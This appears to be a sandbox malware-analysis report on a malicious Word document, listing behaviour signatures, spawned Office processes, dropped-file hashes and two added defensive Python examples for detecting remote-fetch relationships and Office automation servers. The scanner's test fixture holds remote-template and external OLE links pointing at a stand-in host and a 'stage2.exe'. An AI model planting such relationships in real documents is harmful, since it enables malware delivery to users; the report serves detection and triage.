Analysis

  • max time kernel
    150s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system
  • submitted
    27-06-2024 20:46

General

  • Target

    17767305c2c5405843391c90c8165baf_JaffaCakes118.doc

  • Size

    235KB

  • MD5

    17767305c2c5405843391c90c8165baf

  • SHA1

    b054020587cd294da3995c7b834788bd0b31064e

  • SHA256

    72dce1f47edcaa64212929c42533b306435b0e2b8fd4a496e92b1808617d7507

  • SHA512

    569535c50c50597191251471d4e34caee6aed62604d4e66986e35e5c0812835fe01f53e6041fded521e2683d2b5ac6c2adbfe939f70fe47d00b2765e0fc86815

  • SSDEEP

    1536:eterThwxEM5OsmqrmrAK9hbQ+HrTPGynK/dRYgjQVgs+07kVY/uocJanITRN8C:eUwxv5OsmqrmrAKHREdSgjQist4VaiaK

Score
7/10

Malware Config

Signatures

  • Abuses OpenXML format to download file from external location (4 IoCs)
  • Drops file in Windows directory (1 IoC)
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry (2 TTPs, 3 IoCs)
  • Modifies Internet Explorer settings (1 TTP, 31 IoCs)
  • Modifies registry class (64 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (2 IoCs)
  • Suspicious use of SetWindowsHookEx (13 IoCs)
  • Suspicious use of WriteProcessMemory (4 IoCs)
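The first signature fires on both the Word process and the Excel automation servers, which points at OOXML relationship parts that carry an external target (a remote template, linked OLE object, frame or image) either in the document itself or in an embedded package. The scanner below is an added example written for this page, not code from the sandbox or its vendor; it walks every `.rels` part of a package, flags `TargetMode="External"` relationships of the types Office resolves on its own, and recurses into embedded packages such as `word/embeddings/*.xlsx`. The document it scans is constructed in memory, and the hostnames and paths inside it are placeholders rather than indicators from this report. Note that the submitted file carries a `.doc` name; the check assumes a zip-based (OOXML) container and will raise `BadZipFile` on a genuine binary `.doc`.

```python
"""Flag Office Open XML relationships that make Office fetch content from
outside the package, including inside embedded packages.

Added example for this report, not code from the sandbox or its vendor.
The sample document is constructed in memory; the hostnames and paths in
it are placeholders, not indicators from the report.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_TYPE_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types Office resolves on its own when the part loads, as
# opposed to a hyperlink the user must click. Kept narrow to limit noise.
AUTO_FETCH_TYPES = {"attachedTemplate", "oleObject", "frame", "image", "subDocument"}
EXTERNAL_SCHEMES = {"http", "https", "ftp", "file"}


def is_remote(target: str) -> bool:
    """URL, file:// or UNC targets are remote; relative paths stay local.
    Drive-letter paths (C:\\...) are deliberately left alone: urlsplit
    reports their scheme as the drive letter."""
    if target.startswith("\\\\") or target.startswith("//"):
        return True
    return urlsplit(target).scheme.lower() in EXTERNAL_SCHEMES


def scan_package(data: bytes, prefix: str = "") -> list:
    """Return [(part, rel_type, target)] for each .rels entry that is
    TargetMode="External", of an auto-fetched type, with a remote target.
    Any member that is itself a zip (e.g. word/embeddings/*.xlsx) is
    scanned recursively; its findings are prefixed with the member path."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            blob = zf.read(name)
            if name.endswith(".rels"):
                for rel in ET.fromstring(blob).iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("TargetMode") != "External":
                        continue
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    target = rel.get("Target", "")
                    if rel_type in AUTO_FETCH_TYPES and is_remote(target):
                        findings.append((prefix + name, rel_type, target))
            elif blob[:4] == b"PK\x03\x04":
                findings.extend(scan_package(blob, prefix + name + "::"))
    return findings


def _rels(entries) -> bytes:
    """Serialize a .rels part from (rel_type, target, is_external) tuples."""
    root = ET.Element(f"{{{REL_NS}}}Relationships")
    for i, (rel_type, target, external) in enumerate(entries, 1):
        attrs = {"Id": f"rId{i}", "Type": REL_TYPE_BASE + rel_type, "Target": target}
        if external:
            attrs["TargetMode"] = "External"
        ET.SubElement(root, f"{{{REL_NS}}}Relationship", attrs)
    return ET.tostring(root, encoding="UTF-8", xml_declaration=True)


def build_sample() -> bytes:
    """Constructed .docx: settings.xml pulls a remote template, and an
    embedded workbook links an OLE object from a file:// location."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels", _rels([
            ("oleObject", "file:///C:/Users/Public/stage2.exe", True),
        ]))
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", _rels([
            ("settings", "settings.xml", False),               # package-local
            ("hyperlink", "https://example.test/page", True),  # user-clicked, not flagged
        ]))
        z.writestr("word/_rels/settings.xml.rels", _rels([
            ("attachedTemplate", "http://template.example/t.dotm", True),
        ]))
        z.writestr("word/embeddings/oleObject1.xlsx", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for part, rel_type, target in scan_package(build_sample()):
        print(f"{part}: {rel_type} -> {target}")
```

Against the constructed sample this reports the remote `attachedTemplate` in `word/_rels/settings.xml.rels` and the `file://` `oleObject` inside the embedded workbook, and stays silent on the external hyperlink, which only matters if a user clicks it. Widen `AUTO_FETCH_TYPES` if your triage tolerates more noise.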

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\17767305c2c5405843391c90c8165baf_JaffaCakes118.doc"
    PID: 2204
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
      • C:\Windows\splwow64.exe (child of PID 2204)
        C:\Windows\splwow64.exe 12288
        PID: 2668
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    PID: 2964
    • Abuses OpenXML format to download file from external location
    • Enumerates system info in registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    PID: 2272
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    PID: 632
    • Abuses OpenXML format to download file from external location
    • Enumerates system info in registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    PID: 2480
    • Abuses OpenXML format to download file from external location
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    PID: 2676
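Only splwow64.exe appears as a child of the Word process that opened the document; the Excel instances and the second WINWORD.EXE were started with `/automation -Embedding`, i.e. as COM automation servers, and the process list places them at the same level as the initial WINWORD.EXE rather than under it. A parent-child rule keyed on WINWORD.EXE therefore misses them. The function below is an added example for this page, not sandbox code, and attributes such servers to the most recent interactive Office open from a user-writable path within a time window instead. The event records are constructed to mirror the process list: image paths, command lines and PIDs come from the report, but the timestamps and parent PIDs are assumed (the report gives neither) and the document name is shortened to `sample.doc`.

```python
"""Correlate Office automation servers with the document open that preceded them.

Added example for this report, not sandbox vendor code. Events are constructed:
images, command lines and PIDs mirror the process list; timestamps and parent
PIDs are assumed, and the document name is shortened.
"""
import re
from datetime import datetime, timedelta

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
USER_WRITABLE = ("\\appdata\\local\\temp\\", "\\downloads\\")
# First drive-letter path in a command line that ends in an Office document extension.
DOC_RE = re.compile(r'"?([a-z]:\\[^"]+?\.(?:docx?|docm|dotm|rtf|xlsx?|xlsm|xlsb))"?', re.I)

OFFICE14 = r"C:\Program Files (x86)\Microsoft Office\Office14"
EVENTS = [  # constructed Sysmon event 1 style records, trimmed to the fields used
    {"ts": "2024-06-27T20:46:10", "pid": 2204, "ppid": 1480,  # ppid assumed (explorer)
     "image": OFFICE14 + r"\WINWORD.EXE",
     "cmd": f'"{OFFICE14}\\WINWORD.EXE" /n "C:\\Users\\Admin\\AppData\\Local\\Temp\\sample.doc"'},
    {"ts": "2024-06-27T20:46:12", "pid": 2668, "ppid": 2204,
     "image": r"C:\Windows\splwow64.exe", "cmd": r"C:\Windows\splwow64.exe 12288"},
    {"ts": "2024-06-27T20:46:15", "pid": 2964, "ppid": 680,   # ppid assumed (DcomLaunch svchost)
     "image": OFFICE14 + r"\EXCEL.EXE", "cmd": f'"{OFFICE14}\\EXCEL.EXE" /automation -Embedding'},
    {"ts": "2024-06-27T20:46:20", "pid": 2272, "ppid": 680,
     "image": OFFICE14 + r"\WINWORD.EXE", "cmd": f'"{OFFICE14}\\WINWORD.EXE" /Automation -Embedding'},
    {"ts": "2024-06-27T20:46:31", "pid": 632, "ppid": 680,
     "image": OFFICE14 + r"\EXCEL.EXE", "cmd": f'"{OFFICE14}\\EXCEL.EXE" /automation -Embedding'},
    {"ts": "2024-06-27T20:55:00", "pid": 2480, "ppid": 680,   # timestamp assumed late: negative case
     "image": OFFICE14 + r"\EXCEL.EXE", "cmd": f'"{OFFICE14}\\EXCEL.EXE" /automation -Embedding'},
]


def attribute_automation_servers(events, window=timedelta(seconds=120)):
    """For each Office process started with -Embedding, find the most recent
    Office process within `window` that opened a document from a user-writable
    path. Returns [(server_pid, server_image, doc_pid, doc_path)]; servers with
    no such predecessor in the window are omitted."""
    opened = []  # (ts, pid, doc_path) of interactive document opens, in time order
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if image not in OFFICE_APPS:
            continue
        ts = datetime.fromisoformat(ev["ts"])
        if "-embedding" in ev["cmd"].lower():
            for ots, opid, doc in reversed(opened):   # newest open first
                if ts - ots <= window:
                    hits.append((ev["pid"], image, opid, doc))
                    break
            continue
        m = DOC_RE.search(ev["cmd"])
        if m and any(marker in m.group(1).lower() for marker in USER_WRITABLE):
            opened.append((ts, ev["pid"], m.group(1)))
    return hits


if __name__ == "__main__":
    for server_pid, image, doc_pid, doc in attribute_automation_servers(EVENTS):
        print(f"{image} pid {server_pid} <- document open pid {doc_pid}: {doc}")
```

With the assumed timestamps, PIDs 2964, 2272 and 632 are tied back to the open of `sample.doc` in PID 2204, while PID 2480 falls outside the two-minute window and is dropped; widening the window pulls it in. The window is the knob to tune against normal Office behaviour (embedded charts legitimately start EXCEL.EXE the same way), so combine the hit with the dropped `MSForms.exd` or the OpenXML signature before alerting.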

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD
    Filesize  128KB
    MD5       88ccbc8cbd1fdef46f8e278420281e6e
    SHA1      78bb12d171266ed099e951796ae5269f1a04092a
    SHA256    e65acef4d32e9cfcb9c8d78a2ef5e87a7815d0af5187bac85a8a05f96ce64eef
    SHA512    e678fb4bf536f2396a80025c91b158561a221dae579e546e9362753f52afd16a15b51e23d0ad810ba5d12e228ce07f596531d79be0c74bb0d26b3d4bd4ddf408

  • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{E64F4D88-ECE2-4002-ADBA-03538AC3E976}.FSD
    Filesize  128KB
    MD5       4f694468669df83d47767c827374d482
    SHA1      6919eec81539fd79f0ed891ec51f281c74893eb9
    SHA256    b147cb08f12587024c3cccb2f0ba6169b5b28e6baba9141778ce9755030d8ad1
    SHA512    6e2d377165b99a125031d69f948753d8dd78ebd9d8a05a5980369e91a4fe9e59bef77c368239c5e82fbfd5b5c6f81d583ca4296927a915883e371e6a7a3431e7

  • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF
    Filesize  114B
    MD5       15ed048f44e023f1a6820f094e286a7a
    SHA1      bbe3b02e4c8fa20c36398cbf0ec275c49cbecec4
    SHA256    f5db6faaaae42f04504b1ea49065c731edd4ee8c1382842747b4c80dbb83f749
    SHA512    80cf53fc3e8a5599eb4c49184473a2040d43632bcb7578499f8504b08e4b149e2acf2d2883a2130cb7afacca63468514c3dc7a2fee51270abe0d3d84b4f2737a

  • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD
    Filesize  128KB
    MD5       e7cfdf557f4a9d4f8ea5519cd8f62695
    SHA1      f17579f2b0906e16ead8ddf44a4e498ddc063fd8
    SHA256    6589a258829e82f6c5f89f4fea3f23e9378d2d01cf975647bdf52209ea7b9857
    SHA512    73c5b76a843d1e5776a6bec52df9d1a64ee89ceede57d675e0fc9e7d0eec8936193b0b68d7f24f9b88e3fae39d0b15cb2d894c27958e41f4b2c355c375ac7e6e

  • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (rewritten; second content)
    Filesize  128KB
    MD5       b0c97b75f5d890eee68e92efe99544e5
    SHA1      e19cf08a9079ccc5db30b792ef5fe420f2f95d4f
    SHA256    c377642a20ede5238fe4095612171cd5e95d58557d67a983a798153b33eeb422
    SHA512    c93a033dfcfc614d6246d53a3e488a02ebe7fcf2a1d4e9503fa49081359fb57ad67f4cd8ca375bd7eb10c7dce278607d8a15fe94fe62c6b23c220ed6f1106a2f

  • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{39C49F59-BEEE-432E-94FD-FD76ECE326D6}.FSD
    Filesize  128KB
    MD5       3e4f548b17c29796ef0c19d3f74974e6
    SHA1      f7ca1d384d1121b426ab2743f6ce8fee953d6fca
    SHA256    93d12fbd474db1fb8608cb504140d8bf3ca10a43db87b698f0a4fa337fe95636
    SHA512    7eab68c82ba7d6b3220a9c8c7e75f5c1e8ba2080b30310d4eee17ad0f0685fb21f8eabc214756e1f09da1af2e53e72f294cd639bfbcec5a4a6412b7ec7de4add

  • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{39C49F59-BEEE-432E-94FD-FD76ECE326D6}.FSD (rewritten; second content)
    Filesize  128KB
    MD5       a4b38cffa42b5840481c259aeb2e0131
    SHA1      59695ee59a239b34f81f08df41074ffdb162f253
    SHA256    6c170da018a0d93652dd9f22f0978b5ab20ac02146a4d761401e96b58e05c84b
    SHA512    47eea88a09bd895459632e23636ee2858c9f130e229946ef8626d91eccccd54d9b01985ab541ec61a398753731bb18034c4dd12b3582e6b5dbbe70c47ae5481a

  • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF
    Filesize  114B
    MD5       d11a05a1d2346111d8dbad448ef4d9c1
    SHA1      9f11c2af92197fd1ff7c46c66ffd2f49af5ef1e2
    SHA256    50fe5f8252e4e929520c66f9c5285b9d56ce45adc034aca969df832aa6550937
    SHA512    7337a18e88d93037f03a5aa95658db30692391147320298db4889b0cc6869761a5f810ad6315388770196e6434394a0db2923e069a2bf0093ae2507bc39f7365

  • C:\Users\Admin\AppData\Local\Temp\VBE\MSForms.exd
    Filesize  143KB
    MD5       8155f3f49d43b8a1fb926677d11b5811
    SHA1      0a612324e216f0d3fb5fc3267006aec3ca6a314d
    SHA256    2f0ffe3372abf6d585ff188dd9cd8361a9d114e45af4dbe7874ba8ad2b072d70
    SHA512    54a60cede5e6f8707ed8fcdddd7ec4f762253f4707c4aca9325a25047a983bc36fce61fef1fa19f472ef1d27d1888cfcd684e36457a4a11cbc5a7e4be3201747

  • C:\Users\Admin\AppData\Local\Temp\{859DFB4B-2403-4603-9764-7855FF009C1F}
    Filesize  128KB
    MD5       a448363a5d14a0a934f8e09cec51d45f
    SHA1      3bf5e84712eb6a6d48ab3feba3f31b47d102d623
    SHA256    9067370e931d7b8d694b8c34cbf294a376e62e8f12feec7e89ee3f7994a0cd71
    SHA512    39811df98c97f836f606f8766c9db18f884173157e094e04f74502778f0b06fcd3d181ebd07c5d84f687b14775a55f7395a26f4063e4995e79f7d19ce1968ef0

  • C:\Users\Admin\AppData\Roaming\Microsoft\Office\MSO1033.acl
    Filesize  36KB
    MD5       953d9b9092dd18dfd78602b336efe373
    SHA1      2c055e04ad6a1f67c93196f32db8e7f0655e21be
    SHA256    1a93766e97b510129d57c9955774fef4ddffe6d8688b068c40b60a2035b1fa01
    SHA512    7583445363c6954608a15ad125a2e4a0b7c0bc9afdf24fd35042dddd7c73d3d9a2037e5d4699aa254081cdb6c6c1e08cadea25f8e3abbdc155240d70ba419287

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
    Filesize  20KB
    MD5       2b90f38bb8430f229c1dd4af5363cac0
    SHA1      76ff6efae08421bdc554820d552a6be093fabd2c
    SHA256    1dbd7b37bfbf537878832fa2d9b9680403d0ca5021df9dc59000ba4d0221708d
    SHA512    aa6ebf26cab0c216a69a31c6795842073a4978f560feec89e35e251a5273c1c03d378b8a6085b12b029da9e0d759ba48fa0b418879cf9aaa490eaefdb86c531a

  • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
    Filesize  2B
    MD5       f3b25701fe362ec84616a93a45ce9998
    SHA1      d62636d8caec13f04e28442a0a6fa1afeb024bbb
    SHA256    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
    SHA512    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

  • memory/2204-0-0x000000002F3F1000-0x000000002F3F2000-memory.dmp
    Filesize  4KB

  • memory/2204-61-0x0000000000380000-0x0000000000480000-memory.dmp
    Filesize  1024KB

  • memory/2204-11-0x000000007141D000-0x0000000071428000-memory.dmp
    Filesize  44KB

  • memory/2204-2-0x000000007141D000-0x0000000071428000-memory.dmp
    Filesize  44KB

  • memory/2204-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize  64KB

  • memory/2964-1015-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize  64KB